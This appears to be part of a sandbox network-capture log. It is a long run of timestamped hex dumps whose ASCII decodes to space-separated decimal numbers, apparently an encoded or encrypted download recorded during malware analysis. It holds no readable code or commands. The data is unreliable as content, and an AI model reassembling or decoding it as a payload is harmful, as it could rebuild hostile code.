                    2021-10-26 16:59:45 UTC3783INData Raw: 35 20 31 31 20 30 20 31 20 39 35 20 35 38 20 31 32 32 20 38 37 20 36 37 20 31 31 31 20 32 39 20 36 38 20 34 32 20 32 37 20 35 36 20 32 20 36 37 20 32 32 20 39 31 20 31 38 20 35 32 20 35 35 20 39 32 20 33 33 20 39 31 20 38 36 20 39 36 20 36 37 20 32 35 20 34 39 20 37 20 39 34 20 36 38 20 31 35 20 34 38 20 31 37 20 31 31 20 33 37 20 32 36 20 36 35 20 39 35 20 31 20 31 30 37 20 36 39 20 39 34 20 32 20 36 30 20 32 34 20 38 31 20 31 32 20 31 37 20 37 20 39 33 20 39 34 20 36 37 20 35 33 20 32 32 20 33 20 33 33 20 34 39 20 31 35 20 31 33 20 35 30 20 32 31 20 31 30 35 20 33 20 32 39 20 32 36 20 39 20 31 32 34 20 38 31 20 31 30 39 20 39 30 20 36 30 20 36 20 30 20 32 20 39 20 37 31 20 31 32 32 20 31 32 31 20 33 20 36 32 20 36 35 20 35 35 20 31 34 20 35 34 20 36 20
                    Data Ascii: 5 11 0 1 95 58 122 87 67 111 29 68 42 27 56 2 67 22 91 18 52 55 92 33 91 86 96 67 25 49 7 94 68 15 48 17 11 37 26 65 95 1 107 69 94 2 60 24 81 12 17 7 93 94 67 53 22 3 33 49 15 13 50 21 105 3 29 26 9 124 81 109 90 60 6 0 2 9 71 122 121 3 62 65 55 14 54 6
                    2021-10-26 16:59:45 UTC3799INData Raw: 20 32 31 20 35 33 20 33 32 20 33 34 20 36 31 20 38 31 20 39 39 20 37 20 31 30 31 20 31 31 32 20 36 34 20 31 20 33 39 20 39 20 38 35 20 31 33 20 31 35 20 35 34 20 31 31 39 20 37 39 20 34 20 38 34 20 32 34 20 38 37 20 31 32 34 20 36 34 20 31 30 38 20 34 35 20 36 35 20 32 32 20 32 39 20 33 39 20 39 37 20 39 31 20 35 20 38 32 20 35 39 20 37 34 20 33 35 20 35 39 20 34 20 39 30 20 38 37 20 31 35 20 31 31 20 38 34 20 38 31 20 37 32 20 32 38 20 36 30 20 31 30 39 20 39 37 20 31 30 39 20 31 30 30 20 34 38 20 33 39 20 32 34 20 35 30 20 37 20 31 32 30 20 37 20 31 30 30 20 38 33 20 32 20 35 20 33 32 20 32 38 20 33 34 20 31 30 36 20 38 32 20 31 31 35 20 31 31 20 31 30 35 20 31 31 34 20 38 36 20 38 30 20 31 20 31 31 37 20 39 30 20 36 36 20 36 20 32 20 31 36 20 36 37 20
                    Data Ascii: 21 53 32 34 61 81 99 7 101 112 64 1 39 9 85 13 15 54 119 79 4 84 24 87 124 64 108 45 65 22 29 39 97 91 5 82 59 74 35 59 4 90 87 15 11 84 81 72 28 60 109 97 109 100 48 39 24 50 7 120 7 100 83 2 5 32 28 34 106 82 115 11 105 114 86 80 1 117 90 66 6 2 16 67
                    2021-10-26 16:59:45 UTC3815INData Raw: 35 20 39 34 20 31 30 36 20 31 30 34 20 32 20 33 36 20 30 20 36 20 38 30 20 31 31 32 20 31 37 20 31 33 20 36 37 20 31 30 33 20 36 20 35 31 20 32 39 20 31 35 20 31 38 20 31 31 36 20 39 32 20 31 30 30 20 31 31 36 20 35 30 20 33 20 37 20 31 30 20 33 20 39 33 20 38 20 37 32 20 38 33 20 36 30 20 33 34 20 31 38 20 38 30 20 37 37 20 35 30 20 31 39 20 31 35 20 37 31 20 34 35 20 31 30 20 35 20 31 31 20 33 31 20 39 34 20 31 32 34 20 31 30 33 20 39 34 20 32 35 20 34 20 35 31 20 35 37 20 35 32 20 31 31 39 20 32 20 39 30 20 31 30 35 20 33 39 20 31 31 20 33 20 36 30 20 37 37 20 31 35 20 34 38 20 31 37 20 31 31 20 33 37 20 36 31 20 36 32 20 36 32 20 32 39 20 31 30 37 20 31 31 37 20 36 20 31 20 34 20 36 34 20 31 35 20 37 33 20 33 37 20 31 30 36 20 36 35 20 31 31 37 20 31
                    Data Ascii: 5 94 106 104 2 36 0 6 80 112 17 13 67 103 6 51 29 15 18 116 92 100 116 50 3 7 10 3 93 8 72 83 60 34 18 80 77 50 19 15 71 45 10 5 11 31 94 124 103 94 25 4 51 57 52 119 2 90 105 39 11 3 60 77 15 48 17 11 37 61 62 62 29 107 117 6 1 4 64 15 73 37 106 65 117 1
                    2021-10-26 16:59:45 UTC3831INData Raw: 20 31 36 20 33 30 20 31 31 32 20 31 30 32 20 39 35 20 31 31 32 20 37 39 20 33 32 20 32 33 20 35 32 20 33 31 20 32 20 38 33 20 37 33 20 35 30 20 31 31 33 20 34 39 20 36 20 35 35 20 32 30 20 34 20 38 37 20 36 37 20 35 30 20 36 39 20 34 39 20 36 20 34 32 20 33 36 20 33 38 20 35 30 20 36 37 20 38 37 20 36 36 20 31 31 20 35 37 20 31 36 20 32 30 20 31 31 32 20 31 31 33 20 36 36 20 38 37 20 38 37 20 33 32 20 32 33 20 34 39 20 38 20 31 39 20 36 34 20 37 33 20 36 36 20 36 36 20 35 39 20 30 20 31 31 37 20 35 37 20 32 20 38 33 20 39 34 20 36 35 20 38 30 20 35 39 20 30 20 32 34 20 34 33 20 32 35 20 39 32 20 38 31 20 39 34 20 31 31 36 20 35 36 20 32 39 20 32 32 20 36 20 31 31 32 20 36 35 20 38 35 20 37 30 20 31 30 35 20 32 31 20 37 20 31 20 32 20 35 34 20 39 34 20 36
                    Data Ascii: 16 30 112 102 95 112 79 32 23 52 31 2 83 73 50 113 49 6 55 20 4 87 67 50 69 49 6 42 36 38 50 67 87 66 11 57 16 20 112 113 66 87 87 32 23 49 8 19 64 73 66 66 59 0 117 57 2 83 94 65 80 59 0 24 43 25 92 81 94 116 56 29 22 6 112 65 85 70 105 21 7 1 2 54 94 6
                    2021-10-26 16:59:45 UTC3847INData Raw: 35 20 31 38 33 20 31 31 37 20 31 32 30 20 39 36 20 31 32 34 20 32 34 30 20 31 37 35 20 35 30 20 33 35 20 31 38 33 20 31 31 37 20 39 39 20 35 33 20 31 30 33 20 31 30 31 20 33 35 20 31 37 36 20 31 35 31 20 35 32 20 36 39 20 32 34 33 20 38 34 20 31 32 34 20 34 38 20 35 38 20 33 37 20 33 35 20 31 38 32 20 32 34 39 20 31 31 35 20 31 30 30 20 32 33 36 20 38 31 20 33 36 20 35 35 20 35 33 20 35 36 20 37 33 20 31 31 39 20 39 36 20 31 32 37 20 32 34 30 20 31 35 35 20 34 39 20 34 36 20 33 39 20 32 31 33 20 38 33 20 31 30 33 20 32 33 36 20 31 30 35 20 35 38 20 34 35 20 33 35 20 31 38 33 20 31 31 37 20 31 31 36 20 31 31 37 20 31 31 31 20 31 31 33 20 36 30 20 34 35 20 35 35 20 33 35 20 38 33 20 31 32 30 20 31 32 33 20 31 31 32 20 31 31 37 20 33 35 20 31 37 36 20 32 35
                    Data Ascii: 5 183 117 120 96 124 240 175 50 35 183 117 99 53 103 101 35 176 151 52 69 243 84 124 48 58 37 35 182 249 115 100 236 81 36 55 53 56 73 119 96 127 240 155 49 46 39 213 83 103 236 105 58 45 35 183 117 116 117 111 113 60 45 55 35 83 120 123 112 117 35 176 25
                    2021-10-26 16:59:45 UTC3863INData Raw: 34 34 20 31 39 33 20 31 36 32 20 31 34 33 20 33 34 20 32 35 20 39 35 20 32 30 36 20 31 30 34 20 31 37 20 31 33 31 20 33 36 20 36 39 20 32 33 33 20 32 35 30 20 31 39 38 20 31 35 37 20 32 37 20 31 33 34 20 38 36 20 31 36 36 20 32 30 20 31 30 36 20 32 35 34 20 34 33 20 32 30 32 20 31 37 34 20 32 32 30 20 32 39 20 31 33 37 20 38 31 20 32 33 34 20 34 33 20 32 30 37 20 32 34 38 20 31 38 37 20 32 31 36 20 32 35 35 20 32 32 20 31 35 38 20 31 33 20 36 36 20 32 31 20 35 39 20 31 37 32 20 32 31 37 20 32 34 33 20 32 32 37 20 31 34 30 20 31 32 30 20 31 35 33 20 31 38 36 20 31 30 38 20 34 36 20 37 30 20 31 37 30 20 32 35 31 20 31 32 31 20 37 31 20 36 31 20 31 38 32 20 37 30 20 31 37 39 20 32 32 34 20 32 31 39 20 32 30 37 20 36 31 20 37 32 20 32 30 37 20 31 34 37 20 37
                    Data Ascii: 44 193 162 143 34 25 95 206 104 17 131 36 69 233 250 198 157 27 134 86 166 20 106 254 43 202 174 220 29 137 81 234 43 207 248 187 216 255 22 158 13 66 21 59 172 217 243 227 140 120 153 186 108 46 70 170 251 121 71 61 182 70 179 224 219 207 61 72 207 147 7
                    2021-10-26 16:59:45 UTC3879INData Raw: 33 34 20 31 37 37 20 37 36 20 31 32 39 20 31 32 39 20 34 32 20 31 34 39 20 32 38 20 38 20 31 36 38 20 33 33 20 39 33 20 31 32 33 20 31 31 31 20 31 38 37 20 39 36 20 31 35 39 20 32 31 33 20 39 36 20 32 33 37 20 32 32 36 20 38 34 20 35 36 20 34 37 20 39 30 20 32 32 31 20 37 31 20 35 39 20 31 30 39 20 32 31 33 20 31 32 33 20 35 33 20 31 39 20 34 36 20 31 32 32 20 34 32 20 32 31 20 32 32 32 20 31 37 32 20 36 38 20 31 30 38 20 31 31 39 20 31 36 37 20 32 33 32 20 31 34 37 20 31 33 30 20 32 32 30 20 34 20 37 31 20 31 39 38 20 32 34 36 20 39 35 20 36 32 20 34 38 20 31 32 31 20 31 37 20 32 32 37 20 32 30 31 20 36 38 20 35 30 20 32 30 38 20 32 33 38 20 35 20 32 35 31 20 31 35 34 20 31 30 30 20 31 32 33 20 31 31 32 20 32 35 34 20 39 32 20 31 33 20 31 39 32 20 31 36
                    Data Ascii: 34 177 76 129 129 42 149 28 8 168 33 93 123 111 187 96 159 213 96 237 226 84 56 47 90 221 71 59 109 213 123 53 19 46 122 42 21 222 172 68 108 119 167 232 147 130 220 4 71 198 246 95 62 48 121 17 227 201 68 50 208 238 5 251 154 100 123 112 254 92 13 192 16
                    2021-10-26 16:59:45 UTC3895INData Raw: 31 32 30 20 31 36 32 20 31 36 33 20 32 34 30 20 31 30 35 20 32 31 34 20 32 31 35 20 32 31 36 20 31 35 20 32 36 20 36 30 20 33 37 20 31 35 35 20 32 33 39 20 31 38 34 20 32 30 34 20 36 30 20 32 33 33 20 38 20 36 31 20 38 20 32 32 39 20 31 34 39 20 31 36 39 20 37 39 20 34 33 20 31 38 38 20 32 32 35 20 31 36 37 20 31 36 37 20 32 30 30 20 36 34 20 31 30 38 20 36 36 20 37 37 20 32 20 32 33 35 20 31 32 37 20 31 39 37 20 32 35 34 20 31 20 35 20 32 32 38 20 31 31 37 20 35 31 20 31 35 36 20 37 35 20 31 38 30 20 31 30 33 20 31 33 36 20 31 35 31 20 31 39 39 20 35 31 20 36 35 20 32 20 31 38 30 20 31 33 38 20 36 35 20 31 33 39 20 31 35 36 20 31 37 34 20 31 33 33 20 31 38 37 20 31 36 37 20 31 31 37 20 32 31 20 32 31 33 20 32 33 30 20 31 36 35 20 31 34 33 20 38 32 20 31
                    Data Ascii: 120 162 163 240 105 214 215 216 15 26 60 37 155 239 184 204 60 233 8 61 8 229 149 169 79 43 188 225 167 167 200 64 108 66 77 2 235 127 197 254 1 5 228 117 51 156 75 180 103 136 151 199 51 65 2 180 138 65 139 156 174 133 187 167 117 21 213 230 165 143 82 1
                    2021-10-26 16:59:45 UTC3911INData Raw: 32 32 20 32 20 31 32 31 20 32 32 30 20 31 38 38 20 32 31 34 20 36 32 20 32 30 20 32 30 32 20 32 32 39 20 32 32 33 20 36 38 20 31 35 34 20 32 33 36 20 31 36 30 20 35 33 20 32 33 33 20 34 36 20 39 30 20 32 34 32 20 32 31 38 20 31 39 37 20 31 33 37 20 31 33 36 20 39 31 20 39 39 20 31 30 20 31 34 36 20 31 38 39 20 32 32 32 20 31 31 20 39 39 20 32 31 38 20 31 30 33 20 32 32 39 20 32 32 35 20 33 37 20 31 39 38 20 31 31 36 20 37 31 20 31 33 34 20 33 33 20 31 32 37 20 31 34 34 20 34 36 20 31 35 37 20 31 30 33 20 32 31 34 20 33 35 20 31 30 30 20 32 34 38 20 35 38 20 31 35 35 20 31 33 34 20 31 31 31 20 31 39 36 20 34 36 20 34 35 20 34 31 20 33 36 20 31 38 36 20 34 31 20 31 31 37 20 32 34 36 20 32 31 37 20 32 32 37 20 31 33 37 20 32 32 32 20 31 31 30 20 39 39 20 31
                    Data Ascii: 22 2 121 220 188 214 62 20 202 229 223 68 154 236 160 53 233 46 90 242 218 197 137 136 91 99 10 146 189 222 11 99 218 103 229 225 37 198 116 71 134 33 127 144 46 157 103 214 35 100 248 58 155 134 111 196 46 45 41 36 186 41 117 246 217 227 137 222 110 99 1
                    2021-10-26 16:59:45 UTC3927INData Raw: 31 37 31 20 31 30 37 20 36 35 20 31 37 38 20 32 32 20 32 33 32 20 31 30 38 20 32 33 39 20 39 36 20 31 39 33 20 32 30 30 20 36 31 20 31 35 36 20 33 35 20 31 39 20 32 32 30 20 31 33 30 20 31 39 31 20 31 30 37 20 31 33 34 20 31 32 35 20 38 34 20 31 33 31 20 32 35 35 20 31 34 30 20 32 34 31 20 32 31 35 20 32 33 37 20 31 30 33 20 31 36 38 20 31 35 34 20 36 37 20 32 38 20 36 36 20 35 36 20 32 31 20 32 35 31 20 32 34 34 20 38 31 20 31 37 37 20 32 30 32 20 35 32 20 37 30 20 31 30 30 20 31 34 34 20 39 32 20 31 34 20 31 32 32 20 33 20 33 20 34 30 20 31 34 32 20 31 36 34 20 35 20 31 34 30 20 33 31 20 32 32 35 20 36 20 36 35 20 32 34 31 20 39 36 20 32 30 34 20 36 36 20 38 32 20 31 39 39 20 32 34 31 20 31 36 20 31 34 33 20 31 20 32 32 30 20 31 39 38 20 38 39 20 37 39
                    Data Ascii: 171 107 65 178 22 232 108 239 96 193 200 61 156 35 19 220 130 191 107 134 125 84 131 255 140 241 215 237 103 168 154 67 28 66 56 21 251 244 81 177 202 52 70 100 144 92 14 122 3 3 40 142 164 5 140 31 225 6 65 241 96 204 66 82 199 241 16 143 1 220 198 89 79
                    2021-10-26 16:59:45 UTC3943INData Raw: 32 34 36 20 31 32 37 20 37 39 20 37 34 20 35 32 20 31 39 35 20 31 39 36 20 37 33 20 39 38 20 32 35 33 20 31 38 37 20 33 31 20 31 35 37 20 33 32 20 31 34 30 20 36 30 20 38 38 20 32 31 39 20 31 38 34 20 36 37 20 31 35 30 20 32 37 20 32 30 37 20 38 20 31 34 38 20 32 39 20 31 33 20 31 37 37 20 31 31 32 20 31 36 39 20 38 34 20 31 39 35 20 32 31 39 20 32 34 30 20 31 37 30 20 36 38 20 31 30 33 20 32 33 39 20 31 37 33 20 31 31 35 20 32 31 34 20 31 34 32 20 37 34 20 36 38 20 31 33 39 20 31 36 38 20 31 38 35 20 31 37 33 20 34 37 20 31 30 35 20 37 36 20 36 32 20 31 34 36 20 35 34 20 31 31 30 20 35 32 20 31 33 30 20 39 32 20 31 36 33 20 32 32 39 20 35 39 20 32 32 20 37 30 20 34 38 20 31 31 34 20 37 33 20 34 31 20 32 34 39 20 39 37 20 35 31 20 39 31 20 31 32 35 20 31
                    Data Ascii: 246 127 79 74 52 195 196 73 98 253 187 31 157 32 140 60 88 219 184 67 150 27 207 8 148 29 13 177 112 169 84 195 219 240 170 68 103 239 173 115 214 142 74 68 139 168 185 173 47 105 76 62 146 54 110 52 130 92 163 229 59 22 70 48 114 73 41 249 97 51 91 125 1
                    2021-10-26 16:59:45 UTC3959INData Raw: 20 31 37 38 20 36 30 20 33 37 20 32 32 35 20 32 33 31 20 38 39 20 39 32 20 32 20 32 36 20 34 37 20 31 38 36 20 31 37 39 20 32 31 37 20 31 36 30 20 31 36 34 20 37 31 20 32 38 20 31 31 35 20 31 35 35 20 31 37 20 31 39 31 20 35 38 20 32 32 35 20 31 32 31 20 33 30 20 32 30 35 20 38 34 20 35 20 31 33 31 20 31 31 36 20 31 32 36 20 32 34 34 20 32 32 32 20 32 32 32 20 36 37 20 36 31 20 31 38 38 20 31 38 37 20 32 32 34 20 31 36 33 20 37 39 20 31 39 33 20 31 37 31 20 33 39 20 31 34 36 20 31 36 39 20 31 39 34 20 37 36 20 31 31 39 20 31 31 20 32 31 39 20 34 35 20 39 31 20 32 34 33 20 39 35 20 33 39 20 32 30 33 20 32 31 30 20 35 37 20 31 30 30 20 32 30 32 20 35 39 20 32 31 39 20 31 34 32 20 37 20 31 33 37 20 31 33 37 20 34 38 20 31 34 32 20 30 20 32 30 20 37 32 20 31
                    Data Ascii: 178 60 37 225 231 89 92 2 26 47 186 179 217 160 164 71 28 115 155 17 191 58 225 121 30 205 84 5 131 116 126 244 222 222 67 61 188 187 224 163 79 193 171 39 146 169 194 76 119 11 219 45 91 243 95 39 203 210 57 100 202 59 219 142 7 137 137 48 142 0 20 72 1
                    2021-10-26 16:59:45 UTC3975INData Raw: 35 33 20 32 31 39 20 31 35 39 20 34 31 20 34 32 20 31 34 32 20 31 35 33 20 32 33 35 20 32 33 30 20 32 30 37 20 31 30 36 20 31 30 35 20 32 35 35 20 38 38 20 34 38 20 32 32 32 20 32 38 20 35 36 20 31 32 35 20 31 34 36 20 31 34 30 20 32 33 32 20 31 37 39 20 31 39 39 20 32 33 33 20 31 34 33 20 32 30 30 20 37 37 20 36 37 20 34 38 20 31 31 30 20 33 30 20 31 34 39 20 31 30 32 20 31 37 39 20 32 34 35 20 32 31 38 20 31 36 37 20 39 30 20 37 33 20 37 36 20 31 36 30 20 32 35 30 20 31 31 20 32 32 20 38 30 20 37 34 20 35 33 20 37 37 20 34 39 20 35 37 20 31 38 35 20 31 32 20 31 34 32 20 37 32 20 34 30 20 36 35 20 35 39 20 31 36 35 20 36 20 37 32 20 32 37 20 32 32 36 20 31 35 32 20 31 38 33 20 31 35 35 20 31 35 20 32 31 36 20 31 38 36 20 31 30 38 20 31 33 38 20 31 35 31
                    Data Ascii: 53 219 159 41 42 142 153 235 230 207 106 105 255 88 48 222 28 56 125 146 140 232 179 199 233 143 200 77 67 48 110 30 149 102 179 245 218 167 90 73 76 160 250 11 22 80 74 53 77 49 57 185 12 142 72 40 65 59 165 6 72 27 226 152 183 155 15 216 186 108 138 151
                    2021-10-26 16:59:45 UTC3991INData Raw: 37 20 32 33 34 20 34 30 20 32 35 30 20 38 32 20 34 20 34 32 20 37 34 20 32 33 36 20 32 33 20 31 39 35 20 31 36 35 20 32 30 39 20 31 37 36 20 31 33 32 20 36 30 20 31 38 37 20 31 33 31 20 36 33 20 31 32 20 32 31 20 31 36 34 20 38 35 20 31 33 20 33 32 20 31 30 31 20 32 34 38 20 31 33 35 20 35 32 20 32 30 37 20 32 35 31 20 32 34 37 20 31 35 32 20 31 34 30 20 32 35 30 20 31 33 39 20 31 30 31 20 31 37 34 20 31 36 30 20 32 31 35 20 32 31 31 20 31 39 20 31 30 37 20 36 39 20 31 39 35 20 37 37 20 37 36 20 32 33 30 20 36 31 20 31 34 34 20 31 34 39 20 32 31 20 31 36 36 20 31 37 37 20 31 30 30 20 31 39 20 37 31 20 39 34 20 39 32 20 39 37 20 37 37 20 31 39 31 20 32 30 32 20 31 39 32 20 31 35 36 20 32 31 33 20 39 33 20 31 36 36 20 31 30 31 20 39 32 20 31 36 33 20 32 32
                    Data Ascii: 7 234 40 250 82 4 42 74 236 23 195 165 209 176 132 60 187 131 63 12 21 164 85 13 32 101 248 135 52 207 251 247 152 140 250 139 101 174 160 215 211 19 107 69 195 77 76 230 61 144 149 21 166 177 100 19 71 94 92 97 77 191 202 192 156 213 93 166 101 92 163 22
                    2021-10-26 16:59:45 UTC4007INData Raw: 31 36 35 20 31 36 33 20 31 35 20 31 31 20 31 35 35 20 32 37 20 31 38 32 20 33 38 20 33 35 20 35 32 20 31 35 34 20 31 35 37 20 31 33 38 20 31 31 38 20 31 33 36 20 32 33 37 20 31 38 30 20 38 38 20 31 37 30 20 32 34 30 20 33 20 31 39 20 32 30 35 20 34 20 31 31 37 20 31 33 32 20 31 38 30 20 31 31 35 20 31 35 20 32 33 30 20 31 31 31 20 34 20 36 37 20 34 33 20 37 38 20 31 35 34 20 32 32 35 20 31 35 34 20 31 30 20 31 34 32 20 31 30 20 38 30 20 32 33 37 20 31 38 38 20 31 30 37 20 31 34 38 20 39 39 20 37 33 20 37 20 38 32 20 31 34 31 20 31 38 31 20 32 32 32 20 38 39 20 32 34 35 20 34 20 31 34 37 20 34 37 20 32 31 35 20 39 30 20 31 36 39 20 31 38 34 20 31 30 31 20 32 30 30 20 31 39 31 20 38 30 20 31 36 33 20 32 30 35 20 31 34 36 20 36 32 20 31 36 37 20 36 30 20 32
                    Data Ascii: 165 163 15 11 155 27 182 38 35 52 154 157 138 118 136 237 180 88 170 240 3 19 205 4 117 132 180 115 15 230 111 4 67 43 78 154 225 154 10 142 10 80 237 188 107 148 99 73 7 82 141 181 222 89 245 4 147 47 215 90 169 184 101 200 191 80 163 205 146 62 167 60 2
                    2021-10-26 16:59:45 UTC4023INData Raw: 39 39 20 31 32 30 20 31 31 35 20 31 38 33 20 31 34 39 20 39 35 20 31 34 39 20 31 37 33 20 36 39 20 31 33 33 20 31 33 30 20 31 34 39 20 31 39 39 20 32 39 20 32 36 20 31 36 39 20 31 37 30 20 31 31 20 31 32 36 20 31 38 32 20 32 32 32 20 32 30 35 20 32 39 20 32 34 34 20 31 37 33 20 31 32 30 20 31 30 30 20 32 34 30 20 33 33 20 31 33 36 20 31 36 20 39 30 20 31 30 30 20 32 33 35 20 32 30 37 20 31 30 38 20 32 30 31 20 32 31 33 20 38 32 20 34 33 20 38 34 20 32 33 33 20 32 32 37 20 32 34 35 20 31 39 38 20 31 20 31 35 36 20 39 30 20 31 36 37 20 33 37 20 39 39 20 36 35 20 35 31 20 31 30 31 20 32 34 34 20 31 31 33 20 30 20 31 38 38 20 31 30 37 20 31 38 38 20 38 39 20 31 36 37 20 32 35 33 20 38 37 20 34 32 20 38 35 20 38 32 20 31 35 36 20 33 30 20 34 36 20 36 39 20 37
                    Data Ascii: 99 120 115 183 149 95 149 173 69 133 130 149 199 29 26 169 170 11 126 182 222 205 29 244 173 120 100 240 33 136 16 90 100 235 207 108 201 213 82 43 84 233 227 245 198 1 156 90 167 37 99 65 51 101 244 113 0 188 107 188 89 167 253 87 42 85 82 156 30 46 69 7
                    2021-10-26 16:59:45 UTC4039INData Raw: 20 33 38 20 32 31 30 20 33 37 20 32 32 20 34 36 20 32 31 34 20 32 32 20 31 35 30 20 31 36 33 20 38 31 20 31 37 37 20 32 32 38 20 31 30 20 31 20 31 39 35 20 31 37 32 20 32 30 20 32 32 20 31 30 36 20 31 32 35 20 36 20 33 20 35 39 20 32 31 31 20 31 33 32 20 34 30 20 31 34 38 20 32 31 32 20 31 30 20 31 37 30 20 31 37 31 20 39 31 20 31 38 20 31 35 39 20 31 37 36 20 32 35 20 31 38 39 20 33 31 20 32 32 36 20 31 37 20 31 32 33 20 31 37 32 20 31 36 37 20 32 32 31 20 31 30 32 20 36 34 20 31 33 32 20 39 20 39 32 20 32 31 31 20 31 35 34 20 31 38 37 20 32 32 37 20 32 30 33 20 31 36 20 31 39 38 20 35 37 20 32 32 34 20 32 31 31 20 31 33 38 20 37 35 20 31 30 33 20 32 34 38 20 32 32 37 20 32 33 36 20 31 39 37 20 38 36 20 37 20 36 34 20 31 36 30 20 31 34 32 20 32 31 38 20
                    Data Ascii: 38 210 37 22 46 214 22 150 163 81 177 228 10 1 195 172 20 22 106 125 6 3 59 211 132 40 148 212 10 170 171 91 18 159 176 25 189 31 226 17 123 172 167 221 102 64 132 9 92 211 154 187 227 203 16 198 57 224 211 138 75 103 248 227 236 197 86 7 64 160 142 218
                    2021-10-26 16:59:45 UTC4055INData Raw: 35 31 20 32 31 39 20 32 32 39 20 35 35 20 32 35 33 20 36 32 20 34 33 20 32 31 38 20 32 30 38 20 34 32 20 32 31 38 20 31 39 35 20 31 36 33 20 38 31 20 32 34 30 20 31 34 32 20 33 32 20 31 20 32 30 39 20 38 36 20 31 37 30 20 33 34 20 33 31 20 39 20 31 36 36 20 31 31 20 35 31 20 31 31 38 20 31 39 39 20 38 38 20 31 35 39 20 38 30 20 38 30 20 31 33 35 20 34 30 20 32 30 20 34 20 31 31 38 20 31 36 39 20 31 34 38 20 32 32 33 20 39 33 20 32 32 20 31 39 39 20 37 31 20 36 39 20 31 30 33 20 31 35 32 20 31 35 31 20 31 36 38 20 31 31 37 20 31 33 35 20 31 34 36 20 31 34 37 20 31 39 36 20 36 35 20 35 39 20 36 36 20 36 32 20 32 32 39 20 37 33 20 32 34 30 20 32 32 38 20 38 32 20 35 20 31 39 20 33 33 20 31 34 37 20 37 35 20 31 31 36 20 31 32 38 20 31 39 31 20 31 38 30 20 31
                    Data Ascii: 51 219 229 55 253 62 43 218 208 42 218 195 163 81 240 142 32 1 209 86 170 34 31 9 166 11 51 118 199 88 159 80 80 135 40 20 4 118 169 148 223 93 22 199 71 69 103 152 151 168 117 135 146 147 196 65 59 66 62 229 73 240 228 82 5 19 33 147 75 116 128 191 180 1
                    2021-10-26 16:59:45 UTC4071INData Raw: 31 31 20 31 32 34 20 31 34 38 20 31 33 30 20 34 32 20 37 38 20 32 33 39 20 32 30 32 20 38 38 20 33 37 20 38 35 20 32 34 35 20 31 32 37 20 31 38 36 20 31 38 38 20 31 30 35 20 36 30 20 35 31 20 39 20 39 35 20 32 30 31 20 35 39 20 31 30 38 20 31 33 32 20 31 36 33 20 31 38 20 31 39 39 20 31 33 35 20 34 31 20 32 30 39 20 31 35 38 20 31 32 39 20 31 33 36 20 32 34 36 20 32 33 37 20 31 34 34 20 31 33 34 20 34 39 20 39 32 20 31 30 30 20 32 36 20 31 38 20 32 34 34 20 39 30 20 32 32 33 20 32 34 32 20 39 39 20 31 32 36 20 32 33 38 20 32 31 36 20 33 39 20 31 38 32 20 35 35 20 31 36 37 20 39 20 32 31 39 20 31 38 37 20 32 30 33 20 36 32 20 33 39 20 32 35 20 31 31 33 20 31 36 34 20 31 37 20 32 31 30 20 31 38 30 20 33 20 31 31 32 20 33 31 20 31 31 33 20 32 38 20 31 34 33
                    Data Ascii: 11 124 148 130 42 78 239 202 88 37 85 245 127 186 188 105 60 51 9 95 201 59 108 132 163 18 199 135 41 209 158 129 136 246 237 144 134 49 92 100 26 18 244 90 223 242 99 126 238 216 39 182 55 167 9 219 187 203 62 39 25 113 164 17 210 180 3 112 31 113 28 143
                    2021-10-26 16:59:45 UTC4087INData Raw: 34 20 30 20 31 33 32 20 31 30 39 20 31 34 35 20 32 33 39 20 30 20 32 33 37 20 34 38 20 33 36 20 32 34 37 20 39 32 20 32 33 33 20 32 32 32 20 31 35 37 20 32 35 34 20 37 20 31 38 35 20 31 37 36 20 31 36 32 20 31 20 32 31 39 20 31 35 32 20 31 31 36 20 31 32 37 20 31 30 33 20 37 34 20 31 34 32 20 31 31 35 20 31 30 33 20 34 34 20 38 38 20 31 31 38 20 35 34 20 32 35 30 20 31 35 35 20 31 34 35 20 36 36 20 31 35 20 31 39 34 20 36 36 20 32 34 39 20 32 30 38 20 34 31 20 31 36 39 20 39 20 31 33 31 20 31 32 37 20 31 33 30 20 36 36 20 36 36 20 34 37 20 31 37 36 20 31 30 34 20 33 38 20 32 34 37 20 36 38 20 31 39 39 20 31 38 38 20 32 35 32 20 32 31 35 20 33 33 20 38 30 20 32 31 38 20 32 33 20 31 33 39 20 31 36 33 20 33 32 20 31 31 35 20 31 35 33 20 31 39 31 20 32 34 31
                    Data Ascii: 4 0 132 109 145 239 0 237 48 36 247 92 233 222 157 254 7 185 176 162 1 219 152 116 127 103 74 142 115 103 44 88 118 54 250 155 145 66 15 194 66 249 208 41 169 9 131 127 130 66 66 47 176 104 38 247 68 199 188 252 215 33 80 218 23 139 163 32 115 153 191 241
                    2021-10-26 16:59:45 UTC4103INData Raw: 35 20 32 35 34 20 32 34 20 32 20 31 37 34 20 32 33 33 20 37 39 20 32 30 20 38 33 20 35 34 20 32 35 33 20 32 35 34 20 31 35 30 20 32 35 32 20 34 38 20 31 30 33 20 31 32 33 20 31 33 32 20 34 38 20 32 33 30 20 39 30 20 31 36 20 31 31 36 20 31 34 33 20 31 31 34 20 32 33 36 20 32 33 37 20 31 32 31 20 37 20 32 35 20 33 20 32 30 33 20 31 35 30 20 32 34 38 20 37 38 20 37 33 20 31 38 38 20 32 32 20 31 38 39 20 31 30 39 20 37 35 20 31 36 34 20 32 32 32 20 35 32 20 37 31 20 32 31 37 20 31 38 30 20 32 32 35 20 39 33 20 31 33 20 32 30 36 20 31 34 33 20 31 35 39 20 31 39 36 20 32 31 20 39 20 32 33 30 20 36 35 20 31 33 34 20 32 31 20 31 35 37 20 39 30 20 39 31 20 34 35 20 33 30 20 33 37 20 31 35 31 20 32 32 35 20 32 32 36 20 31 39 30 20 32 35 35 20 33 35 20 33 33 20 31
                    Data Ascii: 5 254 24 2 174 233 79 20 83 54 253 254 150 252 48 103 123 132 48 230 90 16 116 143 114 236 237 121 7 25 3 203 150 248 78 73 188 22 189 109 75 164 222 52 71 217 180 225 93 13 206 143 159 196 21 9 230 65 134 21 157 90 91 45 30 37 151 225 226 190 255 35 33 1
